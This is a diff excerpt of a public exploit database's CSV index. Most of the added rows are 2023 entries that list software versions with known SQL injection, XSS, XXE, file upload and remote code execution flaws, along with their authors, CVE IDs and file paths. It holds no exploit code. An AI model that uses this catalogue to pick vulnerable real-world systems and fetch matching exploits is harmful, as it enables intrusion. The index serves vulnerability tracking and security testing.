 33731,exploits/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",webapps,multiple,,2010-03-10,2014-06-13,1,,,,,,https://www.securityfocus.com/bid/38634/info
 9720,exploits/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,webapps,multiple,,2009-09-17,,1,OSVDB-58317;CVE-2009-3307;OSVDB-58316;OSVDB-58315,,,,,
 43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7
 51550,exploits/multiple/webapps/51550.py,"FuguHub 8.1 - Remote Code Execution",2023-07-03,redfire359,webapps,multiple,,2023-07-03,2023-07-03,0,CVE-2023-24078,,,,,
 51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
 50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
 37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
@ -19292,6 +19298,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,,2020-05-22,2020-05-22,0,,,,,,
 9640,exploits/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,webapps,php,,2009-09-10,,1,OSVDB-58360;CVE-2009-3349;OSVDB-58359;CVE-2009-3348,,,,,
 51559,exploits/php/webapps/51559.txt,"GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 32541,exploits/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,webapps,php,,2008-10-28,2014-03-26,1,CVE-2008-5064;OSVDB-49439,,,,,https://www.securityfocus.com/bid/31963/info
 28815,exploits/php/webapps/28815.txt,"H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,webapps,php,,2006-10-14,2016-09-02,1,,,,,,https://www.securityfocus.com/bid/20532/info
 32449,exploits/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,webapps,php,,2008-10-01,2014-03-23,1,CVE-2008-4447;OSVDB-48857,,,,,https://www.securityfocus.com/bid/31524/info
@ -27782,6 +27789,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8866,exploits/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,webapps,php,,2009-06-02,2016-11-23,1,OSVDB-67403;OSVDB-67402;OSVDB-67401;OSVDB-67400;OSVDB-67399;OSVDB-67398;OSVDB-67397;OSVDB-67396;OSVDB-67395;OSVDB-67393;OSVDB-67392;OSVDB-67391;OSVDB-67390;OSVDB-67389;OSVDB-67388;OSVDB-67387;OSVDB-67386;OSVDB-55258;OSVDB-55257;OSVDB-55256,,,,http://www.exploit-db.compodcastgen1.2.zip,
 16109,exploits/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",webapps,php,,2011-02-04,2016-11-14,1,,,,,http://www.exploit-db.compodcastgen1.3.zip,http://www.htbridge.ch/advisory/local_file_inclusion_in_podcast_generator.html
 49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,,2021-05-14,2021-05-14,0,,,,,http://www.exploit-db.comPodcastGenerator-3.1.zip,
 51565,exploits/php/webapps/51565.txt,"PodcastGenerator 3.2.9 - Blind SSRF via XML Injection",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 51454,exploits/php/webapps/51454.txt,"PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 26414,exploits/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",webapps,php,,2013-06-24,2013-06-24,0,OSVDB-94549,,,,,
 11473,exploits/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,webapps,php,,2010-02-15,,1,OSVDB-62343;CVE-2010-0671,,,,,
@ -27852,6 +27860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21279,exploits/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie Manipulation",2002-02-04,frog,webapps,php,,2002-02-04,2012-09-12,1,OSVDB-87416,,,,,https://www.securityfocus.com/bid/4041/info
 28946,exploits/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20974/info
 27946,exploits/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,webapps,php,,2006-06-02,2013-08-30,1,,,,,,https://www.securityfocus.com/bid/18227/info
 51551,exploits/php/webapps/51551.txt,"POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)",2023-07-03,yuyudhn,webapps,php,,2023-07-03,2023-07-03,0,CVE-2023-36348,,,,,
 17959,exploits/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,webapps,php,,2011-10-10,2011-10-10,0,OSVDB-76292;OSVDB-76288;OSVDB-76287,,,,,
 39108,exploits/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",webapps,php,,2014-02-26,2015-12-26,1,CVE-2014-2211;OSVDB-103769,,,,,https://www.securityfocus.com/bid/65817/info
 18320,exploits/php/webapps/18320.txt,"Posse Softball Director CMS - 'team.php' Blind SQL Injection",2012-01-04,"Easy Laster",webapps,php,,2012-01-04,2012-01-04,1,OSVDB-82483;CVE-2012-5291,,,,,
@ -28048,6 +28057,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,,2020-04-20,2020-06-18,0,,,,,,
 49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,,2021-04-09,2021-04-09,0,CVE-2020-15160,,,,,
 49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php,,2021-01-11,2021-01-11,0,,,,,,
 51563,exploits/php/webapps/51563.txt,"Prestashop 8.0.4 - Cross-Site Scripting (XSS)",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 51463,exploits/php/webapps/51463.txt,"Prestashop 8.0.4 - CSV injection",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://github.com/ambionics/prestashop-exploits/blob/3bcb6af9954c03f269623c4752788f8de80602b9/prestashop_aes_cbc/prestashop_cbc_read.py
 45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation
@ -28784,6 +28794,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 51490,exploits/php/webapps/51490.txt,"Rukovoditel 3.3.1 - CSV injection",2023-05-31,"Mirabbas Ağalarov",webapps,php,,2023-05-31,2023-05-31,0,,,,,,
 51322,exploits/php/webapps/51322.txt,"Rukovoditel 3.3.1 - Remote Code Execution (RCE)",2023-04-07,"Mirabbas Ağalarov",webapps,php,,2023-04-07,2023-04-07,0,,,,,,
 51548,exploits/php/webapps/51548.txt,"Rukovoditel 3.4.1 - Multiple Stored XSS",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
 45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip,
 46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip,
@ -28886,6 +28897,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7267,exploits/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,webapps,php,,2008-11-27,2017-01-04,1,OSVDB-57400;CVE-2008-7077,,,,,
 49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php,,2020-12-23,2020-12-23,0,,,,,,
 46840,exploits/php/webapps/46840.txt,"Sales ERP 8.1 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80,2019-05-14,2019-06-10,0,,"SQL Injection (SQLi)",,,,
 51549,exploits/php/webapps/51549.py,"Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)",2023-07-03,"Amirhossein Bahramizadeh",webapps,php,,2023-07-03,2023-07-03,0,CVE-2023-36346,,,,,
 51513,exploits/php/webapps/51513.txt,"Sales Tracker Management System v1.0 - Multiple Vulnerabilities",2023-06-13,"AFFAN AHMED",webapps,php,,2023-06-13,2023-06-19,1,CVE-2023-3184,,,,,
 50659,exploits/php/webapps/50659.txt,"SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)",2022-01-13,"Betul Denizler",webapps,php,,2022-01-13,2022-01-13,0,,,,,,
 37642,exploits/php/webapps/37642.txt,"SaltOS - 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",webapps,php,,2012-08-18,2015-07-19,1,,,,,,https://www.securityfocus.com/bid/55117/info
@ -29974,6 +29986,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40595,exploits/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,webapps,php,80,2016-10-20,2016-10-20,1,CVE-2016-7998,,,,http://www.exploit-db.comSPIP-v3.1.2.zip,
 9448,exploits/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File",2009-08-18,Kernel_Panik,webapps,php,,2009-08-17,,1,CVE-2009-3041;OSVDB-57510,,,,,
 33425,exploits/php/webapps/33425.py,"SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",webapps,php,80,2014-05-19,2014-05-21,0,CVE-2013-2118;OSVDB-93683,,,,http://www.exploit-db.comSPIP-v3.0.8.zip,
 51557,exploits/php/webapps/51557.txt,"spip v4.1.10 - Spoofing Admin account",2023-07-03,nu11secur1ty,webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 51536,exploits/php/webapps/51536.py,"SPIP v4.2.0 - Remote Code Execution (Unauthenticated)",2023-06-20,nuts7,webapps,php,,2023-06-20,2023-06-21,1,CVE-2023-27372,,,,,
 10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,,
 34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php,,2010-07-15,2014-08-12,1,,,,,,https://www.securityfocus.com/bid/41701/info
@ -30681,6 +30694,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17239,exploits/php/webapps/17239.txt,"Time and Expense Management System - Multiple Vulnerabilities",2011-05-03,"AutoSec Tools",webapps,php,,2011-05-03,2011-05-03,0,OSVDB-72105;OSVDB-72106;OSVDB-72107,,,,http://www.exploit-db.comtems.zip,
 45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php,,2018-10-17,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comtems.zip,
 45630,exploits/php/webapps/45630.txt,"Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)",2018-10-17,"Ihsan Sencan",webapps,php,,2018-10-17,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comtems.zip,
 51558,exploits/php/webapps/51558.txt,"Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 11516,exploits/php/webapps/11516.html,"TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)",2010-02-20,ViRuSMaN,webapps,php,,2010-02-19,,1,OSVDB-62478;CVE-2010-0707,,,,http://www.exploit-db.comtimeclock-software.zip,
 39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80,2016-02-03,2020-10-14,0,,,,,,
 48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php,,2020-10-14,2020-10-14,0,,,,,,
@ -31279,6 +31293,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7061,exploits/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass",2008-11-08,d3b4g,webapps,php,,2008-11-07,2017-01-02,1,OSVDB-51101;CVE-2008-5785,,,,,
 7063,exploits/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,webapps,php,,2008-11-07,,1,OSVDB-49675;CVE-2008-5784;CVE-2008-5783,,,,,
 46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - (Authenticated) Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,,2019-02-11,2019-03-16,0,,,,,,
 51562,exploits/php/webapps/51562.txt,"Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 11410,exploits/php/webapps/11410.txt,"Vacation Rental Script - SQL Injection",2010-02-11,JaMbA,webapps,php,,2010-02-10,,1,OSVDB-62296;CVE-2010-0763,,,,,
 6221,exploits/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,webapps,php,,2008-08-09,2016-12-15,1,OSVDB-47372;CVE-2008-3603,,,,,
 15793,exploits/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,webapps,php,,2010-12-20,2010-12-20,1,OSVDB-70019,,,,,
@ -31868,6 +31883,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,,
 50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,,
 51484,exploits/php/webapps/51484.txt,"WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,,
 51566,exploits/php/webapps/51566.txt,"WBCE CMS 1.6.1 - Open Redirect & CSRF",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,,
 43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,,
@ -32160,6 +32176,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80,2014-11-17,2014-11-17,0,OSVDB-114748;OSVDB-114747;OSVDB-114746;OSVDB-114745;OSVDB-114744;OSVDB-114743;OSVDB-114742;OSVDB-114741;CVE-2014-9243;CVE-2014-9242,,,,http://www.exploit-db.comwb283-sp3.tar.gz,
 23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php,,2013-01-09,2013-01-09,1,OSVDB-89046;OSVDB-89045,,,,http://www.exploit-db.comconcertcalendar-v2.2.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt
 51349,exploits/php/webapps/51349.txt,"WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
 51554,exploits/php/webapps/51554.txt,"WebsiteBaker v2.13.3 - Directory Traversal",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 51553,exploits/php/webapps/51553.txt,"WebsiteBaker v2.13.3 - Stored XSS",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php,,2010-08-29,2014-09-06,1,,,,,,https://www.securityfocus.com/bid/42842/info
 44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,,2018-05-22,2018-05-22,0,,,,,,
 7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php,,2009-01-02,2017-01-11,1,,,,,,
@ -33774,6 +33792,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,,2021-03-17,2021-03-17,0,,,,,,
 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,,
 51560,exploits/php/webapps/51560.txt,"WP AutoComplete 1.0.4 - Unauthenticated SQLi",2023-07-03,matitanium,webapps,php,,2023-07-03,2023-07-03,0,CVE-2022-4297,,,,,
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,
 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,